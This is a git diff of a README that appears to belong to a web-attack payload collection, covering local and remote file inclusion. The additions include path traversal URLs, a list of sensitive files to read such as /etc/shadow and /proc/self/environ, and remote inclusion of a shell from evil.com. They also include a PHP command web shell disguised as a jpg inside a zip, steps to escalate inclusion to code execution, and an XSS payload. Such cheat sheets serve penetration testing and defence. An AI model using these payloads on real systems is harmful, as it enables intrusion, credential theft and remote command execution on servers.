diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 8632bd4..4e08f9c 100644
--- a/File Inclusion - Path Traversal/README.md	
+++ b/File Inclusion - Path Traversal/README.md	
@@ -1,9 +1,7 @@
 # Local/Remote File Inclusion
 The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
 
-## Exploit
-
-Basic LFI (null byte, double encoding and other tricks)
+## Basic LFI (null byte, double encoding and other tricks)
 ```
 http://example.com/index.php?page=etc/passwd
 http://example.com/index.php?page=etc/passwd%00
@@ -12,6 +10,31 @@ http://example.com/index.php?page=%252e%252e%252f
 http://example.com/index.php?page=....//....//etc/passwd
 ```
 
+Interesting files to check out :
+```
+/etc/issue
+/etc/passwd
+/etc/shadow
+/etc/group
+/etc/hosts
+/etc/motd
+/etc/mysql/my.cnf
+/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
+/proc/self/environ
+/proc/version
+/proc/cmdline
+```
+
+## Basic RFI (null byte, double encoding and other tricks)
+```
+http://example.com/index.php?page=http://evil.com/shell.txt
+http://example.com/index.php?page=http://evil.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
+```
+
+
+
+## LFI / RFI Wrappers
 
 LFI Wrapper rot13 and base64 - php://filter case insensitive
 ```
@@ -26,7 +49,10 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod
 
 LFI Wrapper ZIP
 ```python
-os.system("echo \"</pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php")
+echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
+zip payload.zip payload.php;   
+mv payload.zip shell.jpg;    
+rm payload.php   
 
 http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ```
@@ -43,13 +69,25 @@ http://example.com/index.php?page=php:expect://id
 http://example.com/index.php?page=php:expect://ls
 ```
 
-
-XSS via RFI/LFI with "<<svg<>svg onload=alert(1)>" payload
-<svg onload=alert(1)>
+## Bonus XSS
+XSS via RFI/LFI with "<svg onload=alert(1)>" payload
 ```
 http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
 ```
 
+## LFI to RCE via /proc/*/fd
+1. Upload a lot of shells (for example : 100)
+2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
+with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
+
+
+## LFI to RCE via Upload
+```
+http://example.com/index.php?page=path/to/uploaded/file.png
+```
+You can injected the <?php system($_GET['c']); ?> into the metadata
+
 ## Thanks to
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
+* [Turning LFI to RFI ](https://l.avala.mp/?p=241)